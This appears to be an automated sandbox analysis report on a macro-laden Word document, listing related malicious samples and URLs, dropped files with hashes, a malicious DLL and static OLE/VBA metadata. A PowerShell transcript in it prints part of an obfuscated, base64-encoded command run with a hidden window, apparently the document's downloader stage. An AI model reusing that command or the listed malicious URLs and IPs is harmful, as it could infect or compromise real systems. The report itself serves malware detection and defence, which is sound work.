	1FXO8fI8R3.exe	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	http://goodjobssolutions.com/mayo-clinic-nmk5w/WQDXUGGDH1memfhbzQba7kowTEW24A/	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	http://bubbawatsongolf.com/_ARCHIVE/1kkkKgOZ0fekTnDr9Y221yQmAabJ8I5yGEFlTawlU5OuJtZyYlUmm9/	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	PO.423pdf.exe	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	PO.423pdf.exe	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	032021CITAR.exe	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	estatement_01_03_2021.exe	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	SecuriteInfo.com.Generic.mg.5d1df2995bd1b54b.exe	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	DHL Statement of Account.exe	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	CjGhhGeHtu.exe	Get hash	malicious	Browse	35.214.169.246 58.97.195.135
	xLH4kwOjXR.exe	Get hash	malicious	Browse	35.214.169.246 58.97.195.135

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.5978590974586744
Encrypted:	false
SSDEEP:	6:0FP0k1GaD0JOCEfMuaaD0JOCEfMKQmDOqh1Al/gz2cE0fMbhEZolrRSQ2hyYIIT:0h7GaD0JcaaD0JwQQO2Ag/0bjSQJ
MD5:	0C0F27F781E3A0A70AFCC47A32A54B10
SHA1:	8D7EF6BD1B27681C4FACC9977DD8732E19D4BAD2
SHA-256:	A03170C094657FED7162F9B6D3FEE02AAB24846B9338330221940FDC663B7592
SHA-512:	B527F51945ECD03AC4E8A32768B994C9A0FCE006D7F9784348A8F8A589F71F0C6A3D5EAC9393BCE47371287909BD7E280CE2B03A36A38F668E08889675AACF34
Malicious:	false
Preview:	......:{..(......5...y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................5...y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x9a06615d, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.09602973189143442
Encrypted:	false
SSDEEP:	12:Qzz0+VH6O4blyT1CsKyzz0+VH6O4blyT1CsK:Qkc/1kc/
MD5:	01FB16433FBAA89B176C5E0022E6EFD2
SHA1:	AA5472EE3EEEB412589F4552510607C9779F509C
SHA-256:	022990E3C73B6037DBEBC785DA942E76A488E4D9698B53CE06BDFB217246C48F
SHA-512:	15ECD594EA432996F0A2F98075A6B9FE80B2BB19A98DF42D550C753182EF3ECCB4CA34FC0A82436B1FD985078FCE4C58A4FF06B93CD6A720C59AEEF63C3B4B67
Malicious:	false
Preview:	..a]... ................e.f.3...w........................&..........w...5...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w..........................................................................................................................................................................................................................................5...y.i.................+&..5...y..........................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.1113547385394607
Encrypted:	false
SSDEEP:	3:ITEvqQece+kuXl/bJdAtitJDelqll:IaqQeR+kAt46CQ
MD5:	2E01FC6BD87A23D082DF526A9A761039
SHA1:	CCE2416B54C4F1BB293459F4C2A7144FEF0E5D05
SHA-256:	E62F40287E7B17F025BD86673853DE76CB85ADC80B81E302D8A081A3112B6B86
SHA-512:	F24024B381539D1FA0F4CD71B124C728E54DC355A5C02435289410FF21099C4E54F5835AFB15C9B408DBD8728E93835A0AD087873FAB24F569C390FF9910B68C
Malicious:	false
Preview:	3sP0.....................................3...w...5...y.......w...............w.......w....:O.....w...................+&..5...y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\6CAFC0F8-7648-4F12-BE38-DAA8582ADD66 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	132942
Entropy (8bit):	5.372923434191453
Encrypted:	false
SSDEEP:	1536:CcQceNgaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLL8Eh:UrQ9DQW+zBX8P
MD5:	10D2087341D88404C3284833C4063437
SHA1:	306559F0F45A89E26DC1C4CC67EBCB678DCD1FE3
SHA-256:	49ACDF5D4F2728EA78054847A680279056E461A641E54FF6E8DD408720B24A21
SHA-512:	0A614965557FD57FBE8CFABAE54F4FF0C7DF7BBAC718596E2AC75346DB87087574EDEA584992D68616972B26530009E048D2E2DCC316F45C93CF8CE3D8C402C1
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-01-07T10:52:50">.. Build: 16.0.13706.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{189012B4-0261-4128-8568-9DA4BA8F2187}.tmp Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5:	1F1446CE05A385817C3EF20CBD8B6E6A
SHA1:	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256:	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512:	252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious:	false
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.9260988789684415
Encrypted:	false
SSDEEP:	3:Nlllulb/lj:NllUb/l
MD5:	13AF6BE1CB30E2FB779EA728EE0A6D67
SHA1:	F33581AC2C60B1F02C978D14DC220DCE57CC9562
SHA-256:	168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
SHA-512:	1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avja2edr.udc.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qa55wgu1.34a.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Informacion_29.doc.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:41 2020, mtime=Thu Jan 7 18:52:50 2021, atime=Thu Jan 7 18:52:48 2021, length=166400, window=hide
Category:	dropped
Size (bytes):	2150
Entropy (8bit):	4.733644204506573
Encrypted:	false
SSDEEP:	24:8pYhOGgOgACu3ADPag7aB6mypYhOGgOgACu3ADPag7aB6m:8eg4CqoaFB6peg4CqoaFB6
MD5:	67FA568120531BD65CB02C1EB2A9265E
SHA1:	EB7B3B4531D25D2E8B61447426888248AE721C8F
SHA-256:	D66FA93FC71AA63B40C8AFA340F8F97CBFE3EC8BC2FC3254969D5D9A80B29182
SHA-512:	090AE02C9E70B5698B7A6FDB9E0C7BEAE3FE43C018A33EA013476880EF79D817FB5BE5A5D5CEC988FD9CC4275A5C655200772D8098548156EC373C0E3001C69A
Malicious:	true
Preview:	L..................F.... ....-m.:...C............................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..'R......................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qvx..user.<.......Ny.'R.......S.....................?d.h.a.r.d.z.....~.1.....>Qwx..Desktop.h.......Ny.'R.......Y..............>.....'hL.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....r.2.....'R.. .INFORM~1.DOC..V......>Qux'R......h.....................i.*.I.n.f.o.r.m.a.c.i.o.n._.2.9...d.o.c.......X...............-.......W...........>.S......C:\Users\user\Desktop\Informacion_29.doc..).....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.n.f.o.r.m.a.c.i.o.n._.2.9...d.o.c.........:..,.LB.)...As...`.......X.......494126...........!a..%.H.VZAj...f..-.........-..!a..%.H.VZAj...f..-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.366272344456327
Encrypted:	false
SSDEEP:	3:M13YMvXc1KGC0LDKXYMvXc1KGCmX13YMvXc1KGCv:MJRXxGZWXRXxGxRXxGs
MD5:	170276DF35DEDBD3C3B4B66995E1FDCD
SHA1:	ACFDC32F5201493C39C246BCD50D51BAC450C1F1
SHA-256:	98F6BAA929518E1CAFB49310F86DA322D7D89DBF19FABACDF1A4A777B6EB6D68
SHA-512:	94C6BA6FF3DCDFC1EABDC2E008841DA56B2FC18C2B2DF6794EAA1E8DD34B1991683BEC0B7A85728FCA88DCF08191CEFEF3E213536B272D2A9C0F5A8243464D50
Malicious:	false
Preview:	[doc]..Informacion_29.doc.LNK=0..Informacion_29.doc.LNK=0..[doc]..Informacion_29.doc.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.2412758570609554
Encrypted:	false
SSDEEP:	3:Rl/ZdOlIFU3vtlD3xWilFtl/3k0op/llf:RtZw+FUrh9U0oRH
MD5:	A63CB46088FF7ACEC3F4C3177F9D27D7
SHA1:	7E337C90377A89B637BA638F2E2A2A5497BF318B
SHA-256:	3EA4A3241627AFCC679539AB95328ECD3C3E9E1A5F2B5B558B0A417780D8D53C
SHA-512:	9B9C46CBADD7CE0E126389FCD7ED9AB2FF21C3BE82F225D155500640D8E3E2EF9D8DA24AAF7652872D70E884EDA82E55AF0C9069E63A3302C231F7B9BF834D14
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h..........9.C...............................3...............................5...........H...

C:\Users\user\Desktop\~$formacion_29.doc Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.2412758570609554
Encrypted:	false
SSDEEP:	3:Rl/ZdOlIFU3vtlD3xWilFtl/3k0op/llf:RtZw+FUrh9U0oRH
MD5:	A63CB46088FF7ACEC3F4C3177F9D27D7
SHA1:	7E337C90377A89B637BA638F2E2A2A5497BF318B
SHA-256:	3EA4A3241627AFCC679539AB95328ECD3C3E9E1A5F2B5B558B0A417780D8D53C
SHA-512:	9B9C46CBADD7CE0E126389FCD7ED9AB2FF21C3BE82F225D155500640D8E3E2EF9D8DA24AAF7652872D70E884EDA82E55AF0C9069E63A3302C231F7B9BF834D14
Malicious:	false
Preview:	.pratesh................................................p.r.a.t.e.s.h..........9.C...............................3...............................5...........H...

C:\Users\user\Documents\20210107\PowerShell_transcript.494126.5cvYSlfI.20210107115253.txt Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	8265
Entropy (8bit):	5.229712275025735
Encrypted:	false
SSDEEP:	192:Rk+lP0gbpUT/l4paWSius89ew9XxOL9vInCKkzdIEp:+WP0gbp6/mEieeqxacWzdN
MD5:	79806776543257E74C90AA9AD60EEF3C
SHA1:	2872FA12BF412805CF1A29C2C43F01C727D79F25
SHA-256:	9C7341E7DF5FC8BD6A7A55AD5A0D31B699348605D0C714852A9C8AAC5B33572D
SHA-512:	9769A267D11D2DC47ECA17A26E2DBAD2AFD317B520967B1F531EEB8FB417FF01195E66E1C717BCDB423E8FDB16C4F0E43BC29235DDC93993CA4044AA6BB5046B
Malicious:	false
Preview:	.**********************..Windows PowerShell transcript start..Start time: 20210107115254..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 494126 (Microsoft Windows NT 10.0.17134.0)..Host Application: POwersheLL -w hidden -ENCOD IAAgACQAVQA2ADMANQAxAD0AWwBUAFkAcABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMQB9AHsANAB9AHsAMwB9AHsANQB9ACIAIAAtAEYAIAAnAHkAUwBUAEUAbQAuAGkAJwAsACcATwAuAGQAaQAnACwAJwBzACcALAAnAEUAYwBUAE8AJwAsACcAUgAnACwAJwBSAFkAJwApACAAIAA7ACQATwBMAFYAIAA9ACAAWwB0AFkAcABlAF0AKAAiAHsAMAB9AHsANwB9AHsAMQB9AHsAOAB9AHsAMwB9AHsANgB9AHsANQB9AHsAMgB9AHsANAB9ACIAIAAtAEYAJwBzAFkAJwAsACcAVABFAG0ALgBOAEUAJwAsACcAbgB0AG0AQQBOACcALAAnAHYAJwAsACcAQQBHAGUAUgAnACwAJwBJACcALAAnAGkAQwBlAFAATwAnACwAJwBzACcALAAnAFQALgBzAGUAUgAnACkAIAAgADsAIAAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAnAFMAaQAnACsAKAAnAGwAZQAnACsAJwBuACcAKQArACcAdAAnACsAKAAnAGwAeQAnACsAJwBDACcAKQArACgAJwBvAG4AdABpACcAKwAnAG4AJwArACcAdQBlACcAKQApADsAJABZAHQAZABfAHA

C:\Users\user\Nsghoht\Gbh5r9o\Q27V.dll Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	433664
Entropy (8bit):	7.13682141586971
Encrypted:	false
SSDEEP:	12288:snzOTW1Ig1hxgsjtuEiJ+F9kuwL/1ZBuK2VDcUX3XSP9m:eEW1SEiUFZwLdZgDcUXSA
MD5:	1A9589BCE302F8B9F62ACC86B6546FA5
SHA1:	56038936029509D40B74BE394D604DF14460D0C9
SHA-256:	3E84B6E0DECEEA49E1546CB3681C0B484F9FDD480EA3C399148E42608DA04B0F
SHA-512:	AD19325CC1E83FCC0D672664B09E2C2791E29031DEC6F7DC94DA9FCEC5CF23C146D93E2284622BFAAA60F9483FD2EC5DA0597A88847DF2C75BDB523EEB29FEA9
Malicious:	true
Antivirus:	Antivirus: Metadefender, Detection: 64%, Browse Antivirus: ReversingLabs, Detection: 61%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B........................=...........M.......M.......M...................9.............................z.............Rich....................PE..L......_...........!.................<....... ......................................................................`...P.......P................................%..<...T...............................@............ ..<............................text...c........................... ..`.rdata...... ......................@..@.data...............................@....rsrc...............................@..@.reloc...%.......&...x..............@..B........................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Download File
Process:	C:\Windows\System32\svchost.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\MpCmdRun.log Download File
Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	data
Category:	modified
Size (bytes):	906
Entropy (8bit):	3.155577999542838
Encrypted:	false
SSDEEP:	12:58KRBubdpkoF1AG3rBfu7k9+MlWlLehB4yAq7ejCIfuW:OaqdmuF3rD+kWReH4yJ7MB
MD5:	1EE718B9AD35072A67E7B32E7A7483CE
SHA1:	8F3879A77B829610B45A565E790D784E58B33655
SHA-256:	880CBC10588F034748753F494A3241CD4A3F7AF8D4D60E010543F66F49418C22
SHA-512:	4C68EFFD38E7021ADAEB477E8DE0761AABF50C1373A254C4D728D9F8BAF5974B0C3716F27B646D9D0ED26CE321F65D3D19752C3476DECBC3A159074F4E5DB905
Malicious:	false
Preview:	........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. T.h.u. .. J.a.n. .. 0.7. .. 2.0.2.1. .1.1.:.5.4.:.3.0.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....E.R.R.O.R.:. .M.p.W.D.E.n.a.b.l.e.(.T.R.U.E.). .f.a.i.l.e.d. .(.8.0.0.7.0.4.E.C.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. T.h.u. .. J.a.n. .. 0.7. .. 2.0.2.1. .1.1.:.5.4.:.3.0.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Industrial, Tools & Health Cliffs Unbranded Soft Tuna Industrial optimal Expanded Cambridgeshire 1080p SMS Money Market Account synthesizing core, Author: Mohamed Gaillard, Template: Normal.dotm, Last Saved By: Louise Fleury, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 29 06:14:00 2020, Last Saved Time/Date: Tue Dec 29 06:15:00 2020, Number of Pages: 1, Number of Words: 2867, Number of Characters: 16346, Security: 8
Entropy (8bit):	6.654073649441584
TrID:	Microsoft Word document (32009/1) 79.99% Generic OLE2 / Multistream Compound File (8008/1) 20.01%
File name:	Informacion_29.doc
File size:	165023
MD5:	6c1cb4c06ead6f5ce29a931fa12410fa
SHA1:	4ac228fa54e73993dcccb69389a97cfcf67228b5
SHA256:	43dab9a4e7aaa8a0d894f6e64d73bb829dd8c40ff8161233fb6e0886b14819c3
SHA512:	f71192ea05b085bf7dc0add6340bee96eb5885cf1720d15b772e7b60b02f55f4004969fbff42cb2804f9c31435a1015a31ed77d4205be3535e7095e980f2142c
SSDEEP:	3072:LHxUDct5DEjo3tbmGBBqLrcBjVJymH4o9ufstRUUKSns8T00JSHUgteMJ8qMD7gb:LHxUDct5DEjo3tbmGBBqLrcBjVJymH4r
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	74f4c4c6c1cac4d8

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "Informacion_29.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:	Industrial, Tools & Health Cliffs Unbranded Soft Tuna Industrial optimal Expanded Cambridgeshire 1080p SMS Money Market Account synthesizing core
Author:	Mohamed Gaillard
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:	Louise Fleury
Revion Number:	1
Total Edit Time:	0
Create Time:	2020-12-29 06:14:00
Last Saved Time:	2020-12-29 06:15:00
Number of Pages:	1
Number of Words:	2867
Number of Characters:	16346
Creating Application:	Microsoft Office Word
Security:	8

Document Summary
Document Code Page:	1252
Number of Lines:	136
Number of Paragraphs:	38
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Jwq9b1lb0hmm7, Stream Size: 14416

General
Stream Path:	Macros/VBA/Jwq9b1lb0hmm7
VBA File Name:	Jwq9b1lb0hmm7
Stream Size:	14416
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 fc 0a 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 03 0b 00 00 9f 29 00 00 00 00 00 00 01 00 00 00 06 12 1b 22 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
MoyUg
#BrygCBI
HQLYP()
gNNhpjuZF:
ywWmAGeG:
WkbcFJEAD()
Gyyqq()
Access
#pIXfAL
Len(mKbjhqs))
dNGEjAD
#rxYZps,
gJLEFBFsL()
AeWeHOJCg
tKzwqzI()
Resume
"O:\afdxHDJBG\OOakBB\YSVJm.JNPGbSG"
tKzwqzI
#MoyUg
SkWVG
"F:\UeqgCwFC\RxvLiOJ\RLltYG.ddhvuGkBf"
RimyuHaBD:
#DfnXDeC,
DfnXDeC
GbSOBaBqc:
UfOeJ
wcDKJI
"F:\WnCoG\HBbVaCA\fukyDw.vGjESBX"
#BIeAA,
"O:\MRWMgFJ\zsKRHI\OiSxC.XZZmtH"
VORRAG()
kBZBQ()
#DfnXDeC
"O:\ZrqrOBE\FXQPgFGG\sXMnHEFDC.KjybCdXDB"
ktJgD
ktJgD()
#dNGEjAD,
#MoyUg,
"O:\NSaqADG\xcZtJId\QXNwGFN.KtgHGEA"
fMGbFJDRE
JeDBhB()
FreeFile
DnGiABxzG()
Gyyqq
LOF(intGend)
#fFPBDj,
XNcuAGoGD:
"O:\rrOzBX\vKCgAGJu\YNZlI.zUSFWsZF"
LITXEDEBE
#tSFvVJKHm
JeDBhB
BIeAA
ZWAfIID
#BrygCBI,
"F:\mWSwpXAkG\PTfrgAdE\ddNtJFJ.OGZBEnFW"
"O:\xaLnPmJ\onZFlHPHD\pjbxIFFyV.svJWEETFm"
#vjURJ
"O:\GyBLIwJ\JyRgQhPrC\cnPdi.CmtbG"
"F:\AKQUADx\HTvZJNG\ezFFDE.dCWKQ"
#JvVTCss
ykcixJTsM:
"O:\qklyMYNC\IkLXI\wrvzJw.AssIJ"
ZCRUUEr
#aPIAJ
pIXfAL
"F:\IdwCD\hmrPgFD\cRBUGEn.vHNcDFc"
snahbsd
NFVBCEf
"O:\jobmCCM\LsFeNKGF\DLsTwJcGF.EAyuxB"
ReDim
"O:\YNLYhp\IlEWOXUB\zsUqqD.dEGfRCFGF"
lkVoRJ
BrygCBI
#efPVC
"O:\wYEmvKo\npTgDE\QjFhGJ.dWmjGFD"
AUrNIzEG()
#fFPBDj
